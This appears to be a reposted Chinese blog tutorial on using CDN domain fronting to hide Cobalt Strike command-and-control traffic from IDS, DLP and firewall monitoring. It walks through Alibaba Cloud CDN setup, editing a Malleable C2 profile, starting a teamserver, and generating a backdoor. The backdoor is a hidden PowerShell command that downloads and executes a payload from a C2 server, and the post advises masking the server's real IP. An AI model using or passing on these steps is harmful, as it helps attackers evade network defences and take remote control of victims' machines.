域前置Cobalt Strike逃避IDS审计

Posted Tenet@1014

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了域前置Cobalt Strike逃避IDS审计相关的知识,希望对你有一定的参考价值。

域前置Cobalt Strike逃避IDS审计

域前置简介

域前置(Domain Fronting)基于HTTPS通用规避技术,也被称为域前端网络攻击技术。

这是一种用来隐藏Metasploit、Cobalt Strike等团队控制服务器流量,以此来一定程度绕过检查器或防火墙检测的技术,如Amazon、Google、Akamai等大型厂商会提供一些域前端技术服务。

域前置技术原理(CDN分发)

通过CDN节点将流量转发到真实的C2服务器,其中CDN节点IP通过识别请求的HOST头进行流量转发,利用我们配置域名的高可信度,如我们可以设置一个微软的子域名,可以有效的躲避DLP、agent等流量检测。原理如下

工作原理(也就是CDN工作原理)

域前置的核心是CDN

CDN工作原理:

同一个IP可以被不同的域名进行绑定加速,再通过HTTP请求包头里的HOST域名来确定访问哪一个。

比如我们ping www.dcpc.com

得到IP:1.81.2.59
在这里插入图片描述

通过IP反查域名,可以看到很多域名绑定在这个IP上,这个就是CDN
在这里插入图片描述

www.3636.com和www.youka.la都是这个CDN服务器下的域名并且都保定了别名进行CND加速

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

通过curl访问网页,可以看到HOST头域名

curl -v www.3636.com

在这里插入图片描述

指定HOST

curl 1.81.2.59 -H "host:www.3636.com" -v

可以看到,依然可以访问到
在这里插入图片描述

如果IP没有绑定HOST www.3636.com,那么就无法访问

一句话说明:CDN是通过HOST来判断你要访问那个网站的)

当访问www.3636.com这个域名的时候,实际上也是访问同一个CDN服务器,它的IP也是1.81.2.59

此处把IP替换为www.youka.la依然可以访问,并且内容一致

在这里插入图片描述

在这里插入图片描述

因为是CND服务器,所以会隐藏真实IP,所以C2服务器的真实IP可以得到隐藏保护。

域前置操作

备案域名1个

免费SSL申请:https://help.aliyun.com/document_detail/156645.html?spm=a2c6h.12873639.0.0.52105de0zFR8Tc&source=5176.11533457&userCode=r3yteowb

阿里云CDN控制中心:https://cdn.console.aliyun.com/overview

设置CDN

在这里插入图片描述

在这里插入图片描述

解析设置

在这里插入图片描述

CDN设置
在这里插入图片描述

多地ping测试,可以看到多个IP
在这里插入图片描述

配置Cobalt Strike

修改C2的profile配置文件

下载C2:https://github.com/xx0hcd/Malleable-C2-Profiles

选择合适的profile文件,修改HOST头为准备好的域名(get和post都要改)

可以CTRL+F 然后全部替换

月师傅的
在这里插入图片描述

用c2lint检查一下

./c2lint cdn.profile

在这里插入图片描述

开启teamserver

nohup ./teamserver xxx.xx.xx.99 qweqweqwe999 cdn.profile

nohub表示不挂断的运行命令,不然shell断了CS也会连接不上

在这里插入图片描述

kali上启动Cobalt Strike

在这里插入图片描述

开启监听

在这里插入图片描述

生成后门

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://1xx.xx.xx.99:8080/a'))"

实际使用中,不能直接把真实IP暴露出来,应该另存为网页,通过其他IP进行访问

在这里插入图片描述

成功加密

在这里插入图片描述

以上是关于域前置Cobalt Strike逃避IDS审计的主要内容,如果未能解决你的问题,请参考以下文章

Cobalt Strike生成证书,修改C2 profile流量加密混淆

Cobalt Strike 的 ExternalC2

红队 Cobalt Strike 安全加固

Cobalt Strike 连接启动教程,制作图片🐎

kali cobalt strike metasploit的服务停止 怎么修改

Cobalt-Strike基本使用